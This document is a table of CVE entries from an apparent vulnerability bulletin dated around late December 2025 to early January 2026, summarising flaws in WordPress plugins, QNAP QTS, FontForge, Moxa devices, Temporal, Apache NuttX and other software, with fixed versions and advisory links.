| QNAP Systems Inc.--Malware Remover | An improper control of generation of code vulnerability has been reported to affect Malware Remover. The remote attackers can then exploit the vulnerability to bypass protection mechanism. We have already fixed the vulnerability in the following version: Malware Remover 6.6.8.20251023 and later | 2026-01-02 | not yet calculated | CVE-2025-11837 | https://www.qnap.com/en/security-advisory/qsa-25-47 |
| Unknown--WPBookit | The WPBookit WordPress plugin through 1.0.7 lacks a CSRF check when deleting customers. This could allow an unauthenticated attacker to delete any customer through a CSRF attack. | 2026-01-02 | not yet calculated | CVE-2025-12685 | https://wpscan.com/vulnerability/e5ba488a-b43d-4c5f-9716-4b24701999f3/ |
| Unknown--Knowband Mobile App Builder | The Knowband Mobile App Builder WordPress plugin before 3.0.0 does not have authorisation when deleting users via its REST API, allowing unauthenticated attackers to delete arbitrary users. | 2025-12-31 | not yet calculated | CVE-2025-13029 | https://wpscan.com/vulnerability/22344534-cd36-4817-b683-c0af55759e01/ |
| Unknown--Logo Slider | The Logo Slider WordPress plugin before 4.9.0 does not validate and escape some of its slider options before outputting them back in the dashboard, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2026-01-02 | not yet calculated | CVE-2025-13153 | https://wpscan.com/vulnerability/0ed67947-228d-420c-8d28-e0d7326eb101/ |
| Unknown--Plugin Organizer | The Plugin Organizer WordPress plugin before 10.2.4 does not sanitize and escape a parameter before using it in a SQL statement, allowing subscribers to perform SQL injection attacks. | 2025-12-29 | not yet calculated | CVE-2025-13417 | https://wpscan.com/vulnerability/862fdf28-5195-443d-8ef2-e4043d0fdc92/ |
| Unknown--ShopBuilder | The ShopBuilder WordPress plugin before 3.2.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. | 2026-01-02 | not yet calculated | CVE-2025-13456 | https://wpscan.com/vulnerability/5872ece6-52cb-4306-b7ee-41282815a243/ |
| Unknown--Comments | The Comments WordPress plugin before 7.6.40 does not properly validate user's identity when using the disqus.com provider, allowing an attacker to log in to any user (when knowing their email address) when such user does not have an account on disqus.com yet. | 2026-01-01 | not yet calculated | CVE-2025-13820 | https://wpscan.com/vulnerability/21bc9b41-a967-42dc-9916-bb993b05709c/ |
| Unknown--YaMaps for WordPress Plugin | The YaMaps for WordPress Plugin WordPress plugin before 0.6.40 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2025-12-29 | not yet calculated | CVE-2025-13958 | https://wpscan.com/vulnerability/0d4bb338-f0d0-4b57-8664-1b8cba7cbe52/ |
| Unknown--Ninja Forms | The Ninja Forms WordPress plugin before 3.13.3 allows unauthenticated attackers to generate valid access tokens via the REST API which can then be used to read form submissions. | 2026-01-02 | not yet calculated | CVE-2025-14072 | https://wpscan.com/vulnerability/4b19a333-eb19-4903-aa96-1fe871dd0f9f/ |
| TP-Link Systems Inc.--TL-WR820N v2.8 | A vulnerability in the SSH server of TP-Link TL-WR820N v2.80 allows the use of a weak cryptographic algorithm, enabling an adjacent attacker to intercept and decrypt SSH traffic. Exploitation may expose sensitive information and compromise confidentiality. | 2025-12-29 | not yet calculated | CVE-2025-14175 | https://www.tp-link.com/en/support/download/tl-wr820n/#Firmware https://www.tp-link.com/in/support/download/tl-wr820n/#Firmware https://www.tp-link.com/us/support/faq/4861/ |
| Unknown--Advance WP Query Search Filter | The Advance WP Query Search Filter WordPress plugin through 1.0.10 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin | 2025-12-30 | not yet calculated | CVE-2025-14312 | https://wpscan.com/vulnerability/f06f982b-108b-4fc1-ad48-2f890a06ecf0/ |
| Unknown--Advance WP Query Search Filter | The Advance WP Query Search Filter WordPress plugin through 1.0.10 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin | 2025-12-30 | not yet calculated | CVE-2025-14313 | https://wpscan.com/vulnerability/5ebcdb32-da82-4129-8538-40d1b03a1108/ |
| Unknown--Ultimate Post Kit Addons for Elementor | The Ultimate Post Kit Addons for Elementor WordPress plugin before 4.0.16 exposes multiple AJAX "load more" endpoints such as upk_alex_grid_loadmore_posts without ensuring that posts to be displayed are published authentication. This allows an unauthenticated attacker to query arbitrary posts and retrieve rendered HTML content of private and unpublished ones. | 2025-12-31 | not yet calculated | CVE-2025-14434 | https://wpscan.com/vulnerability/bf3c3193-fc9c-454b-ad4f-94ba1669a312/ |
| Temporal--Temporal | When frontend.enableExecuteMultiOperation is enabled, the server can apply namespace-scoped validation and feature gates for the embedded StartWorkflowExecutionRequest using its Namespace field rather than the outer, authorized ExecuteMultiOperationRequest.Namespace. This allows a caller authorized for one namespace to bypass that namespace's limits/policies by setting the embedded start request's namespace to a different namespace. The workflow is still created in the outer (authorized) namespace; only validation/gating is performed under the wrong namespace context. This issue affects Temporal: from 1.24.0 through 1.29.1. Fixed in 1.27.4, 1.28.2, 1.29.2. | 2025-12-30 | not yet calculated | CVE-2025-14986 | https://github.com/temporalio/temporal/releases/tag/v1.27.4 https://github.com/temporalio/temporal/releases/tag/v1.28.2 https://github.com/temporalio/temporal/releases/tag/v1.29.2 |
| Temporal--Temporal | When system.enableCrossNamespaceCommands is enabled (on by default), the Temporal server permits certain workflow task commands (e.g. StartChildWorkflowExecution, SignalExternalWorkflowExecution, RequestCancelExternalWorkflowExecution) to target a different namespace than the namespace authorized at the gRPC boundary. The frontend authorizes RespondWorkflowTaskCompleted based on the outer request namespace, but the history service later resolves and executes the command using the namespace embedded in command attributes without authorizing the caller for that target namespace. This can allow a worker authorized for one namespace to create, signal, or cancel workflows in another namespace. This issue affects Temporal: through 1.29.1. Fixed in 1.27.4, 1.28.2, 1.29.2. | 2025-12-30 | not yet calculated | CVE-2025-14987 | https://github.com/temporalio/temporal/releases/tag/v1.27.4 https://github.com/temporalio/temporal/releases/tag/v1.28.2 https://github.com/temporalio/temporal/releases/tag/v1.29.2 |
| Moxa--NPort 5000AI-M12 Series | A vulnerability exists in serial device servers where active debug code remains enabled in the UART interface. An attacker with physical access to the device can directly connect to the UART interface and, without authentication, user interaction, or execution conditions, gain unauthorized access to internal debug functionality. Exploitation is low complexity and allows an attacker to execute privileged operations and access sensitive system resources, resulting in a high impact to the confidentiality, integrity, and availability of the affected device. No security impact to external or dependent systems has been identified. | 2025-12-31 | not yet calculated | CVE-2025-15017 | https://www.moxa.com/en/support/product-support/security-advisory/mpsa-257331-cve-2025-15017-active-debug-code-vulnerability-in-serial-device-servers |
| FontForge--FontForge | FontForge SFD File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28564. | 2025-12-31 | not yet calculated | CVE-2025-15269 | ZDI-25-1195 |
| FontForge--FontForge | FontForge SFD File Parsing Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated array. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28563. | 2025-12-31 | not yet calculated | CVE-2025-15270 | ZDI-25-1194 |
| FontForge--FontForge | FontForge SFD File Parsing Improper Validation of Array Index Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated array. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28562. | 2025-12-31 | not yet calculated | CVE-2025-15271 | ZDI-25-1193 |
| FontForge--FontForge | FontForge SFD File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28547. | 2025-12-31 | not yet calculated | CVE-2025-15272 | ZDI-25-1192 |
| FontForge--FontForge | FontForge PFB File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PFB files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28546. | 2025-12-31 | not yet calculated | CVE-2025-15273 | ZDI-25-1191 |
| FontForge--FontForge | FontForge SFD File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28544. | 2025-12-31 | not yet calculated | CVE-2025-15274 | ZDI-25-1190 |
| FontForge--FontForge | FontForge SFD File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28543. | 2025-12-31 | not yet calculated | CVE-2025-15275 | ZDI-25-1189 |
| FontForge--FontForge | FontForge SFD File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28198. | 2025-12-31 | not yet calculated | CVE-2025-15276 | ZDI-25-1187 |
| FontForge--FontForge | FontForge GUtils SGI File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of scanlines within SGI files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27920. | 2025-12-31 | not yet calculated | CVE-2025-15277 | ZDI-25-1186 |
| FontForge--FontForge | FontForge GUtils XBM File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of pixels within XBM files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27865. | 2025-12-31 | not yet calculated | CVE-2025-15278 | ZDI-25-1185 |
| FontForge--FontForge | FontForge GUtils BMP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of pixels within BMP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27517. | 2025-12-31 | not yet calculated | CVE-2025-15279 | ZDI-25-1184 |
| FontForge--FontForge | FontForge SFD File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28525. | 2025-12-31 | not yet calculated | CVE-2025-15280 | ZDI-25-1188 |
| Moxa--NPort 6100-G2/6200-G2 Series | The NPort 6100-G2/6200-G2 Series is affected by an execution with unnecessary privileges vulnerability (CVE-2025-1977) that allows an authenticated user with read-only access to perform unauthorized configuration changes through the MCC (Moxa CLI Configuration) tool. The issue can be exploited remotely over the network with low-attack complexity and no user interaction but requires specific system conditions or configurations to be present. Successful exploitation may result in changes to device settings that were not intended to be permitted for the affected user role, potentially leading to a high impact on the confidentiality, integrity, and availability of the device. No impact on other systems has been identified. | 2025-12-31 | not yet calculated | CVE-2025-1977 | https://www.moxa.com/en/support/product-support/security-advisory/mpsa-251731-cve-2025-1977-cve-2025-2026-multiple-vulnerabilities-in-nport-6100-g2-6200-g2-series |
| Moxa--NPort 6100-G2/6200-G2 Series | The NPort 6100-G2/6200-G2 Series is affected by a high-severity vulnerability (CVE-2025-2026) that allows remote attackers to execute a null byte injection through the device's web API. This may lead to an unexpected device reboot and result in a denial-of-service (DoS) condition. An authenticated remote attacker with web read-only privileges can exploit the vulnerable API to inject malicious input. Successful exploitation may cause the device to reboot, disrupting normal operations and causing a temporary denial of service. | 2025-12-31 | not yet calculated | CVE-2025-2026 | https://www.moxa.com/en/support/product-support/security-advisory/mpsa-251731-cve-2025-1977-cve-2025-2026-multiple-vulnerabilities-in-nport-6100-g2-6200-g2-series |
| IceWhale Tech--CasaOS | CasaOS versions up to and including 0.4.15 expose multiple unauthenticated endpoints that allow remote attackers to retrieve sensitive configuration files and system debug information. The /v1/users/image endpoint can be abused with a user-controlled path parameter to access files under /var/lib/casaos/1/, which reveals installed applications and configuration details. Additionally, /v1/sys/debug discloses host operating system, kernel, hardware, and storage information. The endpoints also return distinct error messages, enabling file existence enumeration of arbitrary paths on the underlying host filesystem. This information disclosure can be used for reconnaissance and to facilitate targeted follow-up attacks against services deployed on the host. | 2026-01-03 | not yet calculated | CVE-2025-34171 | https://casaos.zimaspace.com/ https://github.com/IceWhaleTech/CasaOS https://www.vulncheck.com/advisories/casaos-unauthenticated-file-and-debug-data-exposure |
| fredtempez--ZwiiCMS | ZwiiCMS versions prior to 13.7.00 contain a denial-of-service vulnerability in multiple administrative endpoints due to improper authorization checks combined with flawed resource state management. When an authenticated low-privilege user requests an administrative page, the application returns "404 Not Found" as expected, but incorrectly acquires and associates a temporary lock on the targeted resource with the attacker session prior to authorization. This lock prevents other users, including administrators, from accessing the affected functionality until the attacker navigates away or the session is terminated. | 2025-12-31 | not yet calculated | CVE-2025-34467 | https://github.com/fredtempez/ZwiiCMS https://codeberg.org/fredtempez/ZwiiCMS/releases/tag/13.7.00 https://www.vulncheck.com/advisories/zwiicms-lock-persistence-authenticated-dos-against-administrative-pages |
| libcoap--libcoap | libcoap versions up to and including 4.3.5, prior to commit 30db3ea, contain a stack-based buffer overflow in address resolution when attacker-controlled hostname data is copied into a fixed 256-byte stack buffer without proper bounds checking. A remote attacker can trigger a crash and potentially achieve remote code execution depending on compiler options and runtime memory protections. Exploitation requires the proxy logic to be enabled (i.e., the proxy request handling code path in an application using libcoap). | 2025-12-31 | not yet calculated | CVE-2025-34468 | https://github.com/obgm/libcoap/pull/1737 https://github.com/obgm/libcoap/commit/30db3ea https://libcoap.net/ https://www.vulncheck.com/advisories/libcoap-stack-based-buffer-overflow-in-address-resolution-dos-or-potential-rce |
| Cowrie--Cowrie | Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker's true source address behind the honeypot's IP. | 2025-12-31 | not yet calculated | CVE-2025-34469 | https://github.com/advisories/GHSA-83jg-m2pm-4jxj https://github.com/cowrie/cowrie/releases/tag/v2.9.0 https://github.com/cowrie/cowrie/pull/2800 https://github.com/cowrie/cowrie/issues/2622 https://www.vulncheck.com/advisories/cowrie-unrestricted-wget-curl-emulation-enables-ssrf-based-ddos-amplification |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.6.3195 build 20250715 and later QuTS hero h5.2.6.3195 build 20250715 and later | 2026-01-02 | not yet calculated | CVE-2025-44013 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| httpbin--mccutchen | A cross-site scripting (XSS) vulnerability in mccutchen httpbin v2.17.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | 2026-01-02 | not yet calculated | CVE-2025-45286 | https://github.com/mccutchen/go-httpbin/security/advisories/GHSA-528q-4pgm-wvg2 https://github.com/advisories/GHSA-528q-4pgm-wvg2 |
| QNAP Systems Inc.--QTS | An allocation of resources without limits or throttling vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource. We have already fixed the vulnerability in the following versions: QTS 5.2.6.3195 build 20250715 and later QuTS hero h5.2.6.3195 build 20250715 and later | 2026-01-02 | not yet calculated | CVE-2025-47208 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| Apache Software Foundation--Apache StreamPipes | A user with a legitimate non-administrator account can exploit a vulnerability in the user ID creation mechanism in Apache StreamPipes that allows them to swap the username of an existing user with that of an administrator. This vulnerability allows an attacker to gain administrative control over the application by manipulating JWT tokens, which can lead to data tampering, unauthorized access and other security issues. This issue affects Apache StreamPipes: through 0.97.0. Users are recommended to upgrade to version 0.98.0, which fixes the issue. | 2026-01-01 | not yet calculated | CVE-2025-47411 | https://lists.apache.org/thread/lngko4ht2ok3o0rk9h0clgm4kb0lmt36 |
| QNAP Systems Inc.--QTS | A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following version: QTS 5.2.8.3332 build 20251128 and later | 2026-01-02 | not yet calculated | CVE-2025-48721 | https://www.qnap.com/en/security-advisory/qsa-25-51 |
| Apache Software Foundation--Apache NuttX RTOS | Release of Invalid Pointer or Reference vulnerability was discovered in fs/inode/fs_inoderemove code of the Apache NuttX RTOS that allowed root filesystem inode removal leading to a debug assert trigger (that is disabled by default), NULL pointer dereference (handled differently depending on the target architecture), or in general, a Denial of Service. This issue affects Apache NuttX RTOS: from 10.0.0 before 12.10.0. Users of filesystem based services with write access that were exposed over the network (i.e. FTP) are affected and recommended to upgrade to version 12.10.0 that fixes the issue. | 2026-01-01 | not yet calculated | CVE-2025-48768 | https://github.com/apache/nuttx/pull/16437 https://lists.apache.org/thread/nwo1kd08b7t3dyz082q2pghdxwvxwyvo |
| Apache Software Foundation--Apache NuttX RTOS | Use After Free vulnerability was discovered in fs/vfs/fs_rename code of the Apache NuttX RTOS, that due recursive implementation and single buffer use by two different pointer variables allowed arbitrary user provided size buffer reallocation and write to the previously freed heap chunk, that in specific cases could cause unintended virtual filesystem rename/move operation results. This issue affects Apache NuttX RTOS: from 7.20 before 12.11.0. Users of virtual filesystem based services with write access especially when exposed over the network (i.e. FTP) are affected and recommended to upgrade to version 12.11.0 that fixes the issue. | 2026-01-01 | not yet calculated | CVE-2025-48769 | https://github.com/apache/nuttx/pull/16455 https://lists.apache.org/thread/7m83v11ldfq7bvw72n9t5sccocczocjn |
| nfields--VarCreateStruct | An issue was discovered in matio 1.5.28. A heap-based memory corruption can occur in Mat_VarCreateStruct() when the nfields value does not match the actual number of strings in the fields array. This leads to out-of-bounds reads and invalid memory frees during cleanup, potentially causing a segmentation fault or heap corruption. | 2025-12-30 | not yet calculated | CVE-2025-50343 | https://github.com/tbeu/matio/issues/275 https://github.com/zakkanijia/POC/blob/main/matio/CVE-2025-50343/matio.md |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-52426 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-52430 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-52431 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.0.3192 build 20250716 and later | 2026-01-02 | not yet calculated | CVE-2025-52863 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.0.3192 build 20250716 and later | 2026-01-02 | not yet calculated | CVE-2025-52864 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--License Center | An out-of-bounds read vulnerability has been reported to affect License Center. If a remote attacker gains a user account, they can then exploit the vulnerability to obtain secret data. We have already fixed the vulnerability in the following version: License Center 2.0.36 and later | 2026-01-02 | not yet calculated | CVE-2025-52871 | https://www.qnap.com/en/security-advisory/qsa-25-52 |
| QNAP Systems Inc.--QTS | A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.0.3192 build 20250716 and later | 2026-01-02 | not yet calculated | CVE-2025-52872 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-53405 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-53414 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-53589 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following version: QTS 5.2.7.3256 build 20250913 and later | 2026-01-02 | not yet calculated | CVE-2025-53590 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A use of externally-controlled format string vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to obtain secret data or modify memory. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-53591 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-53592 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-53593 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--Qfinder Pro Mac | A path traversal vulnerability has been reported to affect several product versions. If a local attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data. We have already fixed the vulnerability in the following versions: Qfinder Pro Mac 7.13.0 and later Qsync for Mac 5.1.5 and later QVPN Device Client for Mac 2.2.8 and later | 2026-01-02 | not yet calculated | CVE-2025-53594 | https://www.qnap.com/en/security-advisory/qsa-25-55 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-53596 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--License Center | A buffer overflow vulnerability has been reported to affect License Center. If a remote attacker gains an administrator account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following version: License Center 2.0.36 and later | 2026-01-02 | not yet calculated | CVE-2025-53597 | https://www.qnap.com/en/security-advisory/qsa-25-52 |
| QNAP Systems Inc.--QTS | An out-of-bounds read vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to obtain secret data. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-54164 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | An out-of-bounds read vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to obtain secret data. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-54165 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| QNAP Systems Inc.--QTS | An out-of-bounds read vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to obtain secret data. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3256 build 20250913 and later QuTS hero h5.2.7.3256 build 20250913 and later QuTS hero h5.3.1.3250 build 20250912 and later | 2026-01-02 | not yet calculated | CVE-2025-54166 | https://www.qnap.com/en/security-advisory/qsa-25-50 |
| pangolin--fosrl | Authentication Bypass in fosrl/pangolin v1.6.2 and before allows attackers to access Pangolin resource via Insecure Default Configuration | 2025-12-30 | not yet calculated | CVE-2025-56332 | https://github.com/fosrl/pangolin https://gist.github.com/mrdgef/ef6fa41d69c0457874414c163d7d7d75 |
